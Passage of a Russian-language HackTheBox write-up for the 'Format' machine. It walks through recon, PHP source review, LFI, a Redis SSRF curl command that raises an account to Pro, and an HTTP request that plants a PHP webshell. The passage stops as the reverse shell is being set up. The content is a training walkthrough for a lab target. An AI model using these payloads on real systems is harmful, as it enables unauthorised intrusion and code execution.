{"id":697,"date":"2023-10-02T11:01:59","date_gmt":"2023-10-02T08:01:59","guid":{"rendered":"https:\/\/seq.team\/?p=697"},"modified":"2025-12-02T15:15:39","modified_gmt":"2025-12-02T12:15:39","slug":"razbor-hackthebox-format-medium","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/razbor-hackthebox-format-medium\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox – Format (Medium)"},"content":{"rendered":"\n
\n
\n
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td>Medium<\/td><\/tr>
\u041e\u0421:<\/td>Linux<\/td><\/tr>
\u0411\u0430\u043b\u043b\u044b:<\/td>30<\/td><\/tr>
IP:<\/td>10.10.11.213<\/td><\/tr>
\u0422\u0435\u0433\u0438:<\/td>XSS, LFI, Redis, RCE, Format String Injection<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div>\n\n\n\n
<\/div>\n<\/div>\n\n\n\n

\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n

\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u044d\u043a\u0435\u043d\u0434\u0430 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 PHP. \u0414\u0430\u043b\u0435\u0435, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0447\u0442\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b. \u041f\u043e\u043b\u0443\u0447\u0438\u0432 \u0441\u0442\u0430\u0442\u0443\u0441 Pro \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 microblog.htb<\/code> \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c PHP webshell \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442 \u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f www-data<\/strong><\/code>. \u0414\u0430\u043b\u0435\u0435, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pspy64<\/code>, \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 cooper<\/code> <\/strong>\u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433. \u0417\u0430\u0442\u0435\u043c, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \/usr\/bin\/license<\/code>, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Format String Injection, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root<\/strong> <\/code>\u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433.<\/p>\n\n\n\n

\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n

\n

nmap -sS -p- 10.10.11.213<\/p>\n<\/blockquote>\n\n\n

\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\n3000\/tcp open http\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: nmap -sVC -O -p22,80,3000 10.10.11.213<\/code><\/p>\n\n\n
\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 c3:97:ce:83:7d:25:5d:5d:ed:b5:45:cd:f2:0b:05:4f (RSA)\n|   256 b3:aa:30:35:2b:99:7d:20:fe:b6:75:88:40:a5:17:c1 (ECDSA)\n|_  256 fa:b3:7d:6e:1a:bc:d1:4b:68:ed:d6:e8:97:67:27:d7 (ED25519)\n80\/tcp   open  http    nginx 1.18.0\n|_http-server-header: nginx\/1.18.0\n|_http-title: Site doesn't have a title (text\/html).\n3000\/tcp open  http    nginx 1.18.0\n|_http-title: Did not follow redirect to http:\/\/microblog.htb:3000\/\n|_http-server-header: nginx\/1.18.0\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/pre><\/div>\n\n\n
\u0421\u0440\u0430\u0437\u0443 \u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043c \u0434\u043e\u043c\u0435\u043d \u0432 \/etc\/hosts<\/code>:<\/p>\n\n\n
\n# HTB\n10.10.11.213    microblog.htb\n<\/pre><\/div>\n\n\n
\u041f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0437\u0430\u0439\u0442\u0438 \u043d\u0430 \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441 \u043d\u0430\u0441 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0430 app.microblog.htb<\/code>, \u0435\u0433\u043e \u0442\u0430\u043a\u0436\u0435 \u0441\u0442\u043e\u0438\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u0444\u0430\u0439\u043b \/etc\/hosts<\/code>.<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041d\u0430 \u0441\u0430\u0439\u0442\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0431\u043b\u043e\u0433\u0430 \u0441\u043e \u0441\u0432\u043e\u0438\u043c \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u043e\u043c. \u0415\u0441\u043b\u0438 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u0441\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 XSS \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0435\u0439, \u0442\u043e \u043e\u043d\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041e\u0442\u043c\u0435\u0442\u0438\u0432 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c XSS, \u0432\u0435\u0440\u043d\u0451\u043c\u0441\u044f \u043a \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0435. \u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 app.microblog.htb \u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430\u043c\u0438 \u0436\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u0430:<\/p>\n\n\n
\ngobuster dir -u http:\/\/app.microblog.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0434\u043b\u044f app.*:<\/p>\n\n\n
\n\/login                (Status: 301) [Size: 169] [--> http:\/\/app.microblog.htb\/login\/]\n\/register             (Status: 301) [Size: 169] [--> http:\/\/app.microblog.htb\/register\/]\n\/logout               (Status: 301) [Size: 169] [--> http:\/\/app.microblog.htb\/logout\/]\n\/dashboard            (Status: 301) [Size: 169] [--> http:\/\/app.microblog.htb\/dashboard\/]\n<\/pre><\/div>\n\n\n
\u0418 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0431\u043b\u043e\u0433\u0430:<\/p>\n\n\n
\n\/images               (Status: 301) [Size: 169] [--> http:\/\/l******e.microblog.htb\/images\/]\n\/content              (Status: 301) [Size: 169] [--> http:\/\/l******e.microblog.htb\/content\/]\n\/edit                 (Status: 301) [Size: 169] [--> http:\/\/l******e.microblog.htb\/edit\/]\n<\/pre><\/div>\n\n\n
\u0412\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u043f\u043e\u0440\u0442\u0435 3000 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430<\/h3>\n\n\n\n
\u041f\u0440\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0435 \u043d\u0430 \u043f\u043e\u0440\u0442 3000 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439 Gitea \u0432\u0435\u0440\u0441\u0438\u0438 1.17.3<\/strong>.<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043d\u0430 \u044d\u0442\u043e\u043c \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441\u0435:<\/p>\n\n\n
\ngobuster dir -u http:\/\/microblog.htb:3000 -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n
\u041d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438:<\/p>\n\n\n
\n\/report               (Status: 200) [Size: 4161]\n\/reader               (Status: 405) [Size: 153]\n\/embed                (Status: 405) [Size: 153]\n\/server-status        (Status: 403) [Size: 276]\n<\/pre><\/div>\n\n\n
\u0422\u0430\u043a\u0436\u0435, \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u043d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f microblog \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441 \u0443\u0447\u0451\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f cooper<\/code>:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u0435\u0440\u0435\u0439\u0434\u0451\u043c \u043f\u043e \u043f\u0443\u0442\u0438 \/cooper\/microblog\/src\/branch\/main\/microblog\/sunny\/edit\/index.php<\/code> \u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434:<\/p>\n\n\n
\n[...]\nif (isset($_POST['header']) &amp;&amp; isset($_POST['id'])) {\n    chdir(getcwd() . "\/..\/content");\n    $html = "&lt;div class = \\"blog-h1 blue-fill\\">&lt;b>{$_POST['header']}&lt;\/b>&lt;\/div>";\n    $post_file = fopen("{$_POST['id']}", "w");\n    fwrite($post_file, $html);\n    fclose($post_file);\n    $order_file = fopen("order.txt", "a");\n    fwrite($order_file, $_POST['id'] . "\\n");  \n    fclose($order_file);\n    header("Location: \/edit?message=Section added!&amp;status=success");\n}\n\n\/\/add text\nif (isset($_POST['txt']) &amp;&amp; isset($_POST['id'])) {\n    chdir(getcwd() . "\/..\/content");\n    $txt_nl = nl2br($_POST['txt']);\n    $html = "&lt;div class = \\"blog-h1 blue-fill\\">{$txt_nl}&lt;\/div>";\n    $post_file = fopen("{$_POST['id']}", "w");\n    fwrite($post_file, $html);\n    fclose($post_file);\n    $order_file = fopen("order.txt", "a");\n    fwrite($order_file, $_POST['id'] . "\\n");  \n    fclose($order_file);\n    header("Location: \/edit?message=Section added!&amp;status=success");\n}\n[...]\n<\/pre><\/div>\n\n\n
\u0412 index.php<\/code> \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442\u0441\u044f \u0438\u043c\u044f \u0444\u0430\u0439\u043b\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 id<\/code> \u0434\u0430\u043b\u0435\u0435 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435, \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0435 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 txt<\/code>. \u0418\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u043a\u043e\u0434\u0430 \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u0437\u0430\u043f\u0438\u0441\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0430 \u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0438 \u0437\u0430\u0442\u0435\u043c \u043a\u043e\u043d\u043a\u0430\u0442\u0435\u043d\u0438\u0440\u0443\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430, \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u043e\u0435 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 id \u043a \u0444\u0430\u0439\u043b\u0443 order.txt<\/code>. \u0417\u0430\u0442\u0435\u043c, \u043a\u0430\u043a \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e \u043d\u0438\u0436\u0435, \u0444\u0443\u043d\u043a\u0446\u0438\u044f fetchPage<\/code> \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u043a\u0430\u0436\u0434\u0443\u044e \u0441\u0442\u0440\u043e\u043a\u0443 order.txt \u0438 \u0432\u044b\u0432\u043e\u0434\u0438\u0442. <\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0421\u0443\u0434\u044f \u043f\u043e \u0442\u0430\u043a\u043e\u0439 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043b\u043e\u0433\u0438\u043a\u0435 \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u0442\u044c LFI.<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041e\u0442\u0441\u044e\u0434\u0430 \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0435\u0441\u0442\u044c 2 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f – cooper<\/code> \u0438 git<\/code>.<\/p>\n\n\n\n
\u0422\u0430\u043a\u0436\u0435, \u043f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0445 \u043a\u043e\u0434\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c, \u0447\u0442\u043e \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f Redis – NoSQL \u0421\u0423\u0411\u0414 \u0438 \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0441\u0442\u0440\u043e\u0435\u043d\u0430 \u0432\u0435\u0440\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u0441 \u043f\u043b\u0430\u0442\u043d\u043e\u0439 \u043f\u043e\u0434\u043f\u0438\u0441\u043a\u043e\u0439 \u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438:<\/p>\n\n\n
\n[...]\nfunction checkUserOwnsBlog() {\n    $redis = new Redis();\n    $redis->connect('\/var\/run\/redis\/redis.sock');\n    $subdomain = array_shift((explode('.', $_SERVER['HTTP_HOST'])));\n    $userSites = $redis->LRANGE($_SESSION['username'] . ":sites", 0, -1);\n    if(!in_array($subdomain, $userSites)) {\n        header("Location: \/");\n        exit;\n    }\n}\n\nfunction provisionProUser() {\n    if(isPro() === "true") {\n        $blogName = trim(urldecode(getBlogName()));\n        system("chmod +w \/var\/www\/microblog\/" . $blogName);\n        system("chmod +w \/var\/www\/microblog\/" . $blogName . "\/edit");\n        system("cp \/var\/www\/pro-files\/bulletproof.php \/var\/www\/microblog\/" . $blogName . "\/edit\/");\n        system("mkdir \/var\/www\/microblog\/" . $blogName . "\/uploads &amp;&amp; chmod 700 \/var\/www\/microblog\/" . $blogName . "\/uploads");\n        system("chmod -w \/var\/www\/microblog\/" . $blogName . "\/edit &amp;&amp; chmod -w \/var\/www\/microblog\/" . $blogName);\n    }\n    return;\n}\n\n\nfunction isPro() {\n    if(isset($_SESSION['username'])) {\n        $redis = new Redis();\n        $redis->connect('\/var\/run\/redis\/redis.sock');\n        $pro = $redis->HGET($_SESSION['username'], "pro");\n        return strval($pro);\n    }\n    return "false";\n}\n[...]\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043c\u0430\u0448\u0438\u043d\u0435<\/h3>\n\n\n\n
\u0418\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0443\u0441\u0442\u0440\u043e\u0435\u043d \u043a\u043e\u0434 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0441\u0442\u0430\u0442\u0443\u0441\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f microblog.htb<\/code> \u043c\u043e\u0436\u043d\u043e \u0442\u0430\u043a\u0436\u0435 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434 \u043e \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u043c \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434.<\/p>\n\n\n\n
\u0422\u0430\u043a\u0436\u0435, \u0432 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0434\u043b\u044f Redis \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043c\u0435\u0442\u043e\u0434\u0438\u043a\u0430, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443 SSRF \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0434\u043b\u044f Redis \u043a\u043e\u043c\u0430\u043d\u0434\u044b HSET, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Hash \u0434\u043b\u044f \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f microblog.htb<\/code> \u0434\u043e Pro:<\/p>\n\n\n
\ncurl -X "HSET" http:\/\/microblog.htb\/static\/unix:%2fvar%2frun%2fredis%2fredis.sock:test123%20pro%20true%20a\/b\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c \u0443\u0440\u043e\u0432\u043d\u0435\u043c \u043f\u043e\u0434\u043f\u0438\u0441\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u044d\u0442\u0438 \u0444\u0430\u0439\u043b\u044b \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e \/uploads<\/code> \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043d\u0430 \u0437\u0430\u043f\u0438\u0441\u044c, \u0438\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u043a\u043e\u0434\u0430 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 provisionProUser<\/code>. \u0418\u0442\u0430\u043a, \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u043f\u0440\u0430\u0432\u0430 Pro \u043a\u0430\u043a \u0443\u043a\u0430\u0437\u0430\u043d\u043e \u0432\u044b\u0448\u0435 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043c PHP shell:<\/p>\n\n\n
\nPOST \/edit\/index.php HTTP\/1.1\nHost: l******e.microblog.htb\n[...]\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 87\nOrigin: http:\/\/l******e.microblog.htb\nConnection: close\nReferer: http:\/\/l******e.microblog.htb\/edit\/\nCookie: username=[...]\nUpgrade-Insecure-Requests: 1\n\nid=\/var\/www\/microblog\/test\/uploads\/rev.php&amp;txt=&lt;%3fphp+system($_REQUEST['cmd'])%3b+%3f>\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0422\u0435\u043f\u0435\u0440\u044c, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e PHP webshell \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0440\u0435\u0432\u0435\u0440\u0441 \u0448\u0435\u043b\u043b, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u0442\u043a\u0440\u043e\u0435\u043c \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u0440\u0442 